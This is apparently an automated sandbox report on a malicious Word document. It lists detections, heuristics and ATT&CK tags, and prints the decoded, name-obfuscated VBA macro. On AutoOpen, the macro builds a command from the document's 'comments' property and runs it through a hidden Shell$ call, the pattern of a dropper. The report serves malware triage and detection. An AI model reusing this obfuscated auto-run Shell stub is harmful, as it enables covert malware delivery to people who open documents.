MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. A critical heuristic firing indicates a potential Shell call within the VBA code, and legacy WordBasic auto-exec markers were detected. The presence of the 'macros.bas' file and the critical heuristic suggest the macro is designed to execute a command, likely to download and run a secondary payload, aligning with dropper malware behavior.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6340624-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6340624-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell$ "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + hMxfPTvZXC + Mid(TxxdszysVP, 40) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + avNBbuUD, 0 RUtyUCDcc = 72 + 84 + 68 + 80 + 64 + 86 + 68 + 94 + 89 + 92 + 69 + 56 + 97 + 82 -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub autoopen() avrPreFPA = 100 + 63 + 78 + 90 + 71 + 56 + 68 + 83 + 77 + 70 + 82 + 82 + 62 + 69 + 100 + 73 + 82 + 82 + 96 + 69 -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9097 bytes |
SHA-256: b638b5c5245aa23762bc5b61b94655eaf41a8fc006ef47c578af98297da2f867 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
76 of 99 identifiers look randomly generated (e.g. 'tFFBpbzEVBD') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Function SMUpGxrua() LfMsXThHP = 92 + 59 + 62 + 89 + 60 + 99 + 99 + 64 + 61 + 67 + 58 + 57 + 100 + 76 + 76 + 66 + 63 + 81 + 83 + 63 + 87 NbMrrVRfYWR = 73 + 65 + 98 + 71 + 73 + 92 + 63 + 94 + 59 + 89 + 91 + 81 + 64 + 67 + 93 + 57 + 59 + 62 xkwmzNnXW = 66 + 59 + 57 + 75 + 74 + 93 + 61 + 99 + 64 + 58 + 76 + 63 + 65 + 79 + 89 + 90 + 100 + 98 + 77 BsBvVKDNDsa = 55 + 86 + 80 + 73 + 79 + 99 + 76 + 98 + 83 + 55 + 93 + 55 + 76 CDDGGCnFg = 79 + 58 + 78 + 57 + 89 + 70 + 87 + 81 + 78 + 83 + 72 + 82 + 95 + 100 + 84 + 99 + 99 + 95 + 92 + 73 + 96 UapYHPb = 65 + 95 + 59 + 97 + 89 + 79 + 73 + 71 + 89 + 60 + 98 + 96 + 58 + 84 + 89 + 88 + 55 hMxfPTvZXC = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + Mid(TxxdszysVP, 1, 2) + Mid(TxxdszysVP, 11, 4) + Mid(TxxdszysVP, 23, 6) + "e" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + " " xyySnxUwWh = 75 + 92 + 88 + 97 + 59 + 93 + 64 + 65 + 85 + 59 + 88 + 61 + 95 + 75 + 99 + 56 + 62 + 96 + 92 + 63 bnPwxmSzTH = 63 + 84 + 83 + 70 + 99 + 74 + 70 + 56 + 75 + 93 + 95 + 77 + 91 + 72 + 89 + 67 + 68 + 77 + 83 + 68 + 72 + 73 pgkyPdxc = 66 + 62 + 83 + 96 + 98 + 64 + 69 + 85 + 77 + 73 + 76 + 89 + 81 + 78 + 68 + 66 + 58 + 97 + 60 + 82 + 70 + 62 gRWHnrEt = 72 + 74 + 87 + 80 + 78 + 75 + 100 + 63 + 99 + 56 + 61 + 81 + 55 + 90 + 58 RfVrhVuA = 77 + 77 + 78 + 67 + 61 + 69 + 90 + 93 + 80 + 76 + 71 + 85 + 80 + 86 + 99 + 80 + 88 Shell$ "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + hMxfPTvZXC + Mid(TxxdszysVP, 40) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + avNBbuUD, 0 RUtyUCDcc = 72 + 84 + 68 + 80 + 64 + 86 + 68 + 94 + 89 + 92 + 69 + 56 + 97 + 82 FMsaKtzT = 82 + 60 + 64 + 77 + 68 + 67 + 65 + 60 + 58 + 87 + 95 + 57 + 94 + 69 + 62 + 77 + 85 + 88 + 99 + 95 + 80 + 57 AGdDUfwr = 73 + 77 + 78 + 82 + 65 + 68 + 59 + 88 + 62 + 86 + 85 + 64 + 68 + 100 + 100 + 62 FPhrazsVz = 92 + 57 + 92 + 59 + 61 + 71 + 83 + 63 + 96 + 93 + 100 + 76 + 91 + 95 + 65 + 85 + 64 + 94 + 77 + 72 + 84 + 66 mMtWDypM = 83 + 89 + 61 + 81 + 55 + 78 + 82 + 59 + 88 + 76 + 60 + 100 + 77 + 67 + 85 + 88 + 63 + 70 + 82 + 81 + 67 + 66 End Function Function TxxdszysVP() kELBCRvxK = 98 + 82 + 93 + 80 + 75 + 99 + 96 + 98 + 99 + 59 + 66 + 76 + 99 + 86 + 68 + 97 + 55 + 98 + 88 + 86 + 55 + 82 + 79 FdpkpHT = 66 + 83 + 96 + 70 + 97 + 68 + 83 + 97 + 99 + 59 + 76 + 55 + 61 + 94 + 56 + 91 + 63 + 71 + 58 + 66 + 76 + 64 + 63 + 78 + 57 + 88 UbPUYpBKgp = 79 + 78 + 69 + 55 + 73 + 97 + 70 + 75 + 65 + 78 + 92 + 93 + 92 + 71 + 66 + 95 + 90 + 99 + 63 + 78 + 97 + 74 TsPEutAZ = 69 + 89 + 55 + 86 + 56 + 71 + 96 + 74 + 87 + 74 + 94 + 88 + 59 + 89 + 88 + 97 + 68 + 68 + 95 + 68 + 81 + 67 + 74 + 69 + 61 + 61 tMFRXUCsufw = 83 + 88 + 86 + 89 + 91 + 63 + 61 + 87 + 92 + 70 + 80 + 62 + 87 + 100 + 57 + 64 + 72 + 74 + 67 ytcRXpt = 58 + 97 + 86 + 70 + 100 + 87 + 59 + 93 + 77 + 97 + 56 + 73 + 88 + 93 + 59 + 77 + 71 + 75 + 56 + 98 + 99 + 65 + 75 + 64 AKMnVPdkUnv = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "comme" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "nts" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + cYwdSEuMaLm PKHEvBdfFNg = 96 + 73 + 95 + 63 + 93 + 60 + 90 + 89 + 58 + 61 + 83 + 86 + 57 + 68 + 71 + 79 payrRwDY = 71 + 66 + 91 + 74 + 86 + 83 + 69 + 80 + 88 + 92 + 92 + 78 + 92 + 63 + 95 + 86 + 60 + 93 + 78 + 86 SCtxvMwZHXH = 77 + 98 + 70 + 86 + 86 + 71 + 70 + 60 + 99 + 76 + 57 + 82 + 70 + 61 + 100 + 91 + 89 + 80 + 86 + 91 + 89 + 87 + 93 aabLxWv = 68 + 61 + 73 + 92 + 99 + 72 + 68 + 88 + 63 + 75 + 80 + 90 + 92 + 96 + 83 + 98 + 68 + 80 + 56 + 79 + 59 + 60 + 64 + 67 + 67 RxNcSut = 94 + 71 + 96 + 75 + 81 + 62 + 93 + 84 + 97 + 86 + 97 + 87 + 86 + 91 + 72 + 97 + 62 + 90 + 81 + 95 + 72 DTmLCTawM = 61 + 68 + 72 + 70 + 72 + 94 + 56 + 71 + 69 + 70 + 80 + 93 + 69 + 76 + 96 + 84 + 98 + 71 TFNMbKCMy = 72 + 78 + 78 + 98 + 72 + 87 + 89 + 83 + 63 + 60 + 99 + 94 + 67 + 99 + 75 + 93 + 76 + 72 + 93 + 95 + 58 + 67 + 87 TxxdszysVP = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + ActiveDocument.BuiltInDocumentProperties(AKMnVPdkUnv) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + XZUsuxuC FLrMuYmra = 57 + 60 + 74 + 61 + 73 + 76 + 71 + 89 + 61 + 99 + 99 + 78 + 90 + 90 + 61 + 91 + 81 SnwwedTTXTe = 80 + 93 + 55 + 89 + 64 + 90 + 99 + 70 + 64 + 85 + 62 + 98 + 59 + 78 + 87 + 67 + 80 + 79 + 70 cNXfbNEa = 84 + 70 + 88 + 57 + 93 + 100 + 84 + 84 + 59 + 83 + 60 + 82 + 83 + 89 + 83 + 93 + 69 + 79 dsSgEZArZF = 79 + 55 + 83 + 95 + 95 + 83 + 75 + 98 + 71 + 74 + 89 + 66 + 66 + 78 + 69 + 89 + 83 + 66 + 56 + 81 + 81 + 81 + 90 + 68 + 92 + 69 + 76 + 97 + 67 + 87 + 99 + 97 fTDGbCuF = 95 + 77 + 76 + 99 + 78 + 100 + 56 + 85 + 88 + 56 + 71 + 84 + 75 + 90 + 92 + 59 + 56 + 85 + 97 + 98 + 96 + 65 + 56 + 87 + 83 + 83 uwSZRfndptx = 72 + 60 + 65 + 70 + 98 + 61 + 79 + 93 + 61 + 56 + 71 + 72 + 68 mmvcBCyBBzt = 60 + 73 + 73 + 85 + 81 + 57 + 95 + 98 + 98 + 74 + 67 + 68 + 85 + 66 + 95 + 69 + 77 End Function Sub DyEAfVFbGY() awVtxsHKD = 99 + 83 + 81 + 67 + 84 + 63 + 92 + 86 + 78 + 95 + 77 + 90 + 83 + 79 + 56 + 95 + 76 + 94 + 57 + 100 + 98 + 55 + 98 + 91 + 80 + 76 CdMUTGvdZA = 91 + 70 + 86 + 69 + 64 + 84 + 55 + 77 + 95 + 85 + 68 + 83 + 93 + 60 + 87 + 87 + 90 + 85 + 84 + 60 + 95 + 71 zFpNNCLkUN = 91 + 92 + 89 + 81 + 71 + 82 + 69 + 63 + 68 + 94 + 80 + 64 + 56 + 85 + 86 + 80 + 64 + 72 + 86 + 79 fesdZwvFv = 61 + 56 + 97 + 93 + 93 + 80 + 97 + 84 + 89 + 91 + 82 + 100 + 88 + 55 + 100 + 84 + 59 + 71 + 97 + 77 + 83 uPGcDGvc = 67 + 80 + 94 + 55 + 55 + 68 + 92 + 58 + 70 + 73 + 90 + 55 + 92 + 71 + 56 + 98 + 99 + 69 + 67 + 78 + 75 yTWGrtDcV = 86 + 73 + 81 + 69 + 82 + 75 + 88 + 65 + 87 + 74 + 59 + 76 + 82 + 84 + 71 + 89 SMUpGxrua TsbVezpFSNr = 60 + 91 + 86 + 97 + 65 + 64 + 63 + 89 + 62 + 94 + 71 + 62 + 99 XaXbzbhtAt = 86 + 58 + 81 + 58 + 63 + 69 + 56 + 85 + 87 + 80 + 92 + 92 + 67 + 70 + 74 + 74 + 62 + 61 LzHDDZvS = 98 + 88 + 62 + 57 + 80 + 63 + 86 + 96 + 60 + 80 + 65 + 58 + 59 + 81 + 86 + 67 + 82 + 63 + 90 + 58 mMEFwvcUTBk = 62 + 85 + 55 + 84 + 71 + 79 + 82 + 73 + 72 + 94 + 87 + 61 + 72 + 86 + 86 + 83 + 84 + 90 + 81 + 70 + 68 + 60 + 96 + 60 + 77 + 79 + 56 mxhmNKASgr = 99 + 100 + 88 + 78 + 55 + 74 + 86 + 61 + 72 + 96 + 91 + 87 + 79 + 68 + 75 + 85 + 59 + 64 + 77 VKhhVxYwDss = 63 + 72 + 100 + 78 + 73 + 79 + 60 + 90 + 92 + 90 + 92 + 78 + 88 + 94 + 83 + 99 + 83 + 91 + 85 + 56 + 64 + 85 + 66 + 69 + 100 + 98 uLypGEaw = 100 + 58 + 77 + 97 + 79 + 92 + 85 + 99 + 99 + 91 + 75 + 82 + 98 + 85 + 93 + 98 End Sub Sub autoopen() avrPreFPA = 100 + 63 + 78 + 90 + 71 + 56 + 68 + 83 + 77 + 70 + 82 + 82 + 62 + 69 + 100 + 73 + 82 + 82 + 96 + 69 XsdndfxXk = 88 + 66 + 64 + 93 + 65 + 72 + 59 + 77 + 83 + 61 + 92 + 73 + 78 + 63 + 96 + 82 + 72 epHeyVxU = 78 + 63 + 71 + 79 + 56 + 62 + 85 + 63 + 77 + 76 + 74 + 64 + 95 + 62 + 98 + 57 + 68 + 81 tzyGYTAbft = 69 + 84 + 83 + 96 + 58 + 97 + 55 + 77 + 58 + 55 + 75 + 84 + 82 + 92 + 68 + 57 + 93 + 85 + 95 + 95 + 59 ynpsKeY = 60 + 65 + 89 + 78 + 87 + 86 + 95 + 68 + 76 + 62 + 67 + 69 + 91 + 99 + 98 + 80 + 76 + 82 + 67 + 85 + 94 + 79 + 68 + 65 + 95 HrgnxUf = 61 + 63 + 65 + 74 + 73 + 64 + 98 + 63 + 88 + 64 + 60 + 66 + 83 + 86 + 59 + 88 + 58 + 79 DyEAfVFbGY tFFBpbzEVBD = 95 + 85 + 64 + 83 + 63 + 82 + 81 + 91 + 86 + 62 + 87 + 82 + 72 + 98 + 84 + 82 + 67 + 80 + 74 + 87 + 92 + 83 + 92 + 59 + 90 + 79 + 79 wWxbdvzHZu = 84 + 64 + 97 + 72 + 75 + 62 + 88 + 96 + 73 + 69 + 100 + 69 + 76 + 76 + 77 + 98 + 72 + 73 + 84 + 96 + 81 + 97 + 97 + 89 UwkSNDsM = 94 + 74 + 67 + 78 + 65 + 60 + 60 + 84 + 88 + 60 + 59 + 64 + 89 + 91 + 69 + 80 + 66 rBfuFxXEn = 100 + 80 + 91 + 62 + 89 + 90 + 92 + 98 + 62 + 66 + 70 + 66 + 95 + 58 + 71 + 78 + 55 + 62 ZNZYbtVGX = 65 + 65 + 73 + 90 + 88 + 56 + 88 + 65 + 77 + 97 + 79 + 80 + 66 + 65 + 81 + 75 + 100 + 100 + 91 + 57 + 75 + 88 + 82 + 60 + 73 NDwLRskNRm = 99 + 68 + 74 + 95 + 60 + 56 + 96 + 79 + 70 + 70 + 56 + 79 + 95 + 61 + 88 + 83 + 63 VCLfrCtNZC = 79 + 62 + 59 + 99 + 74 + 87 + 56 + 68 + 87 + 81 + 69 + 55 + 89 + 91 + 95 + 75 + 94 + 61 + 59 + 66 End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.